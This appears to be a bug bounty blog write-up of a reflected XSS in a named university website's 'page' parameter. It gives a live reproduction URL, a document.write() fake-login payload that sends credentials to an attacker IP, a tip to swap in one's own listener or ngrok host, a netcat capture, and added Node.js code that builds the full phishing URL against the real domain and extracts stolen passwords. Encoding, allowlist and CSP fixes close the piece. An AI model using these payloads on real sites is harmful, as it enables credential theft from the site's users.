Cracking the Code: XSS Exploits and Their Power in Phishing Warfare
Dear colleagues,
I'm Hacker Halt, a bug bounty hunter in the cybersecurity field. Recently, I discovered a big problem in Baqai Medical University's website: a vulnerability called XSS (Cross-Site Scripting) and HTML injection in one of its GET parameters.
Today, I'll explain how I found and fixed this issue, which is essential for strengthening web security and earning recognition in bug bounty programs. Baqai Medical University was randomly chosen for assessment, and they've fixed the problem since I alerted them.
Methodology:
- Subdomain Analysis: I used tools like Gobuster to find hidden parts of the website.
- Discovery of Hidden Directories: By checking wordlists like SecLists, I found hidden directories to investigate.
- Identification of Vulnerable Parameters: I closely looked at URL parameters and found where bad code could get in.
- Exploitation and Enumeration: With the vulnerability in mind, I created ways to exploit it.
Summary
This is a reflected XSS: anything placed in the page parameter is written back into the HTML unencoded, so an attacker can inject script through a crafted link. The script runs in the victim's browser under the university's origin, which is enough for data theft or session hijacking. A payload as simple as a popup (alert()) proves that arbitrary script executes, and anything the popup can do, a real payload can do as well.
To reproduce the vulnerability, visit the following URL (the page parameter carries a URL-encoded <script> tag):
https://www.baqai.edu.pk/BMU-QEC.php?page=%3Cscript%3Ealert(%22Join%20Hacker%20Halt%22)%3C/script%3E
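Before firing a full payload, the usual way to confirm a reflected parameter is to send a harmless canary and check which special characters come back unencoded. The following Node.js code is an added example, not part of the original write-up: the probe URL is built against the real parameter name, but the two HTTP response bodies it inspects are constructed for this example to stand in for a vulnerable and a hardened version of the page.

```javascript
// Added example, not part of the original write-up: confirm that a GET
// parameter is reflected into the page without HTML encoding. Instead of
// firing a full <script> payload, send a canary that carries the characters
// an XSS payload needs and check which of them come back untouched.
// The two response bodies below are constructed for this example and stand
// in for a vulnerable and a hardened version of a page like BMU-QEC.php.

const CANARY = 'hhcanary<"\'>';   // a unique tag followed by the characters that matter

// Build the probe URL, URL-encoding the canary into the chosen parameter.
function buildProbeUrl(baseUrl, param, value) {
  const url = new URL(baseUrl);
  url.searchParams.set(param, value);
  return url.toString();
}

// Report whether the canary is reflected and which special characters survived.
function probeReflection(body, canary = CANARY) {
  const tag = canary.replace(/[<>"']/g, '');    // just the alphanumeric part
  const idx = body.indexOf(tag);
  if (idx === -1) {
    return { reflected: false, rawAngle: false, rawQuote: false, exploitable: false };
  }
  const echoed = body.slice(idx, idx + canary.length);
  return {
    reflected: true,
    rawAngle: echoed.includes('<') && echoed.includes('>'),   // can open a tag
    rawQuote: echoed.includes('"') || echoed.includes("'"),   // can break an attribute
    exploitable: echoed === canary,                           // nothing was encoded
  };
}

// Constructed response of a vulnerable page: the parameter is echoed verbatim.
const VULNERABLE_BODY =
  '<html><body><div id="content">Page: ' + CANARY + '</div></body></html>';

// Constructed response of a hardened page: the same value after htmlspecialchars().
const HARDENED_BODY =
  '<html><body><div id="content">Page: hhcanary&lt;&quot;&#039;&gt;</div></body></html>';

// Stand-alone run: print the probe URL and the verdict for both responses.
console.log(buildProbeUrl('https://www.baqai.edu.pk/BMU-QEC.php', 'page', CANARY));
console.log('vulnerable:', probeReflection(VULNERABLE_BODY));
console.log('hardened:  ', probeReflection(HARDENED_BODY));
```

Only when `exploitable` is true (angle brackets and quotes all survive) is a `<script>` payload worth sending; if only quotes survive, the reflection may still be exploitable inside an attribute, which the popup test alone would not show.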
The simple XSS payload executes without any filtering. Now let's turn this reflected XSS into a phishing attack.
The phishing payload is a document.write() call that injects a fake login form into the page. Because the form is rendered inside the university's own page, it looks legitimate to the user, which is what makes this vulnerability so dangerous:
document.write('<h3>Please login to continue</h3><form action="http://192.168.196.92"><input type="text" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');
Replace the IP address in the form's action with your own listener: a host you control, or an ngrok tunnel that forwards to it. The whole script is then wrapped in <script> tags and URL-encoded into the page parameter, exactly as in the reproduction URL above.
Response
The form has no method attribute, so when the victim clicks Login the browser submits it with GET and the username and password travel in the query string of the request. A plain netcat listener (nc -lvp 80) on the attacker's host is enough to capture them; here it received the test credentials hackerhalt:1234567.
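The following Node.js code is an added example, not part of the original write-up. It assembles the complete attack URL from the document.write() payload (with the listener address as a placeholder to replace with your own host or ngrok URL) and decodes the request a netcat listener receives when the victim submits the fake form; the captured request is constructed to match what such a form sends.

```javascript
// Added example, not part of the original write-up: build the complete
// phishing URL from the document.write() payload, and decode the request
// that the attacker's netcat listener receives when the victim submits the
// fake form. The listener address is a placeholder to replace with your own
// host or ngrok URL; the captured request below is constructed to match what
// the form submits.

const LISTENER = 'http://192.168.196.92/';   // placeholder attacker host

// The fake login form from the write-up, with the listener URL dropped in.
// The form has no method attribute, so the browser submits it with GET and
// the credentials travel in the query string of the request line.
function phishingPayload(listener) {
  return (
    "document.write('<h3>Please login to continue</h3>" +
    `<form action="${listener}">` +
    '<input type="text" name="username" placeholder="Username">' +
    '<input type="password" name="password" placeholder="Password">' +
    '<input type="submit" name="submit" value="Login">' +
    "</form>');"
  );
}

// Wrap the payload in a script tag and URL-encode it into the reflected parameter.
function buildAttackUrl(baseUrl, param, listener) {
  const url = new URL(baseUrl);
  url.searchParams.set(param, `<script>${phishingPayload(listener)}</script>`);
  return url.toString();
}

// Read the request line of a raw HTTP request (what `nc -lvp 80` prints) and
// pull the submitted credentials out of its query string.
function extractCredentials(rawRequest) {
  const requestLine = rawRequest.split('\r\n')[0];            // "GET /?username=... HTTP/1.1"
  const target = requestLine.split(' ')[1];                    // "/?username=...&password=..."
  const query = new URL(target, 'http://listener.invalid').searchParams;
  return { username: query.get('username'), password: query.get('password') };
}

// Constructed capture: the request the listener sees after the victim clicks Login.
const CAPTURED_REQUEST = [
  'GET /?username=hackerhalt&password=1234567&submit=Login HTTP/1.1',
  'Host: 192.168.196.92',
  'Referer: https://www.baqai.edu.pk/',
  '',
  '',
].join('\r\n');

// Stand-alone run: print the attack URL and the decoded credentials.
console.log(buildAttackUrl('https://www.baqai.edu.pk/BMU-QEC.php', 'page', LISTENER));
console.log(extractCredentials(CAPTURED_REQUEST));
```

Because the browser URL-decodes the parameter before the server echoes it, the round trip is exact: the script that lands in the page is byte for byte the one placed in the parameter. The Referer header in the capture also tells the listener which site the credentials came from.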
Impact:
Combining XSS with phishing is devastating because the fake login form is rendered inside the university's own page, behind its real URL and certificate, so users have little reason to distrust it. Captured credentials lead to account takeover, identity theft, or financial loss.
Recommendations:
To prevent such attacks, organizations should:
- Validate user input: a parameter like page selects a view, so accept only known page names (an allowlist) rather than echoing whatever was supplied.
- Encode output for the context it lands in (HTML entity encoding for the HTML body, as with htmlspecialchars() in PHP) so reflected input is rendered as text, never as markup.
- Regularly audit website security.
- Educate users about phishing risks, including fake login forms that appear on a legitimate domain.
- Enforce a Content Security Policy that disallows inline scripts, and Multi-Factor Authentication so that a stolen password alone does not grant access.
- Monitor web traffic and keep software up to date.
Following these steps can greatly reduce the risks of XSS and phishing attacks.
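As an added example (not the university's code and not part of the original write-up), here is the server-side fix written in Node.js so it runs stand-alone; the real page is PHP, where the same steps are an allowlist lookup and htmlspecialchars($page, ENT_QUOTES, 'UTF-8'). The page names in the allowlist are assumed. It places a handler that echoes ?page= straight into the markup beside a hardened handler, and adds the Content-Security-Policy header recommended above.

```javascript
// Added example, not part of the original write-up: the server-side fix,
// written in Node.js so it runs here; the real page is PHP, where the same
// steps are an allowlist lookup and htmlspecialchars($s, ENT_QUOTES). The
// page names in the allowlist are assumed. Shown side by side: a handler
// that echoes ?page= straight into the markup, and a hardened handler that
// accepts only known page names and HTML-encodes anything it reflects, plus
// a Content-Security-Policy that stops inline scripts even if another
// reflection is missed.

const PAYLOAD = '<script>alert("Join Hacker Halt")</script>';

// Vulnerable: the parameter lands in the HTML unchanged (like `echo $_GET['page']`).
function renderVulnerable(page) {
  return `<div id="content">Page: ${page}</div>`;
}

// Output encoding: replace the five characters that can change HTML or attribute context.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Input validation: `page` selects a view, so accept only known names (assumed here).
const ALLOWED_PAGES = new Set(['home', 'about', 'qec']);
function resolvePage(page) {
  return ALLOWED_PAGES.has(page) ? page : null;
}

// Hardened: validate first; anything that is reflected back is encoded.
function renderHardened(page) {
  const selected = resolvePage(page);
  if (selected === null) {
    return `<div id="content">Unknown page: ${escapeHtml(page)}</div>`;
  }
  return `<div id="content">Page: ${selected}</div>`;
}

// Defence in depth: a CSP without 'unsafe-inline' means a reflected <script>
// block is not executed even where encoding was forgotten.
const CSP_HEADER =
  "Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'";

// Does the rendered HTML still contain a live script tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Stand-alone run: compare the two handlers on the write-up's alert() payload.
console.log('vulnerable:', renderVulnerable(PAYLOAD));
console.log('hardened:  ', renderHardened(PAYLOAD));
console.log(CSP_HEADER);
```

The allowlist removes the reflection entirely for valid requests; the encoding handles the error path, where some input still has to be shown back to the user; the CSP is the safety net for the reflection nobody found yet. Each layer is independent, which is the point of listing them as separate recommendations.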
Submitted by: Abhishek Aswal
For more insights, subscribe to my YouTube Channel: https://www.youtube.com/channel/UCCJn0QqA7Sppjr6azus09fw